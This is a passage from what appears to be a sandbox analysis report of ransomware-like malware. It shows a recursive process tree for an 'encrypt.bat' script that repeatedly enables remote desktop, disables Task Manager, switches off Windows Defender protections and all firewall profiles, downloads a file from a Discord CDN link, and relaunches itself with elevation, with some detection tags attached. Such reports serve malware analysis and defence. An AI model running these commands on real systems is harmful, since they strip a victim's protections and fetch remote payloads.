25⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:4928
26⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:208
26⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:4812
26⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:4456
26⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:4016
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:3708
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:3524
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4512
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:792
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:4172
26⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:2744
26⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:2852
26⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:2292 | Modifies Windows Firewall
26⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4924 | Modifies Windows Firewall
26⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:2916
26⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:4860
26⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:4236 | Modifies Windows Firewall
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4576
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:204 | Command and Scripting Interpreter: PowerShell
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:2276
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2488
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2852
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2968
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4800 | Blocklisted process makes network request
26⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:2684 | Command and Scripting Interpreter: PowerShell
27⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:1680
28⤵ C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:2264
28⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4640
28⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:4116
28⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:2228
28⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:4816
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1328
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:3524
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4612
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:3056
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:532
28⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:4784
28⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:4168 | Modifies Windows Firewall
28⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:1984
28⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4432
28⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:1344
28⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:1236
28⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:5052
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:3320
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:5036
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:2804
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2244 | Command and Scripting Interpreter: PowerShell
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:1076
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1612
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:264
28⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:1772 | Command and Scripting Interpreter: PowerShell | Modifies registry class
29⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:2804
30⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4572
30⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:1108
30⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:416
30⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:4784
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1628
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4300
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2868
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:1748
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:3244
30⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:736
30⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:5052
30⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:4616
30⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4796
30⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:5096
30⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:4296
30⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:1236
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4704
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1828
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4116
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4380
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:4576
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2012
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4588 | Blocklisted process makes network request
30⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:1828 | Command and Scripting Interpreter: PowerShell | Modifies registry class
31⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:4800
32⤵ C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:3056
32⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4860
32⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:1624
32⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:4176
32⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:2396
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:4816
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:448
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4904
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:4564 | Command and Scripting Interpreter: PowerShell
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2228
32⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:3052
32⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:3024 | Modifies Windows Firewall
32⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:4108
32⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4436
32⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:4380 | Modifies Windows Firewall
32⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:1340
32⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:4936
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4576
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:4856
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:792
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:1128
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2916
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1076
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4836 | Blocklisted process makes network request
32⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:3520 | Command and Scripting Interpreter: PowerShell
33⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:4656
34⤵ C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:264
34⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:1624
34⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:2244
34⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:2524
34⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:4208
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:2432
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4380
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:3016
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:3060
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2472
34⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:3864
34⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:1384 | Modifies Windows Firewall
34⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:5000
34⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:1816
34⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:1232 | Modifies Windows Firewall
34⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:416
34⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:4936
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4968
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:3684
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4512
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4988
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:3064
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1708
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:1748 | Blocklisted process makes network request
34⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:1076 | Command and Scripting Interpreter: PowerShell
35⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:4444
36⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4584
36⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:2540
36⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:1136
36⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:3888
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:532 | Command and Scripting Interpreter: PowerShell
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:1344
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:5032
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2964 | Command and Scripting Interpreter: PowerShell
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2860
36⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:4360
36⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:5000
36⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:4188
36⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:1828
36⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:4016
36⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:164
36⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:1984
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4816
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:3344
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:3716
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:3436
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:4488
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1984
36⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4616 | Blocklisted process makes network request
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"36⤵
- Command and Scripting Interpreter: PowerShell
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"37⤵PID:4608
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"38⤵PID:4864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f38⤵PID:2540
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"38⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f38⤵PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:4676
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable38⤵PID:4544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE38⤵
- Modifies Windows Firewall
PID:5000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off38⤵PID:1100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off38⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off38⤵
- Modifies Windows Firewall
PID:2868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off38⤵PID:2244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off38⤵PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"38⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:4120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"38⤵
- Blocklisted process makes network request
PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"38⤵
- Command and Scripting Interpreter: PowerShell
PID:1448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"39⤵PID:2752
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"40⤵PID:4532
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f40⤵PID:3076
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"40⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f40⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:4984
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable40⤵
- Modifies Windows Firewall
PID:2384
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE40⤵PID:364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off40⤵
- Modifies Windows Firewall
PID:1816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off40⤵PID:4528
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off40⤵PID:2944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off40⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off40⤵
- Modifies Windows Firewall
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"40⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:2540
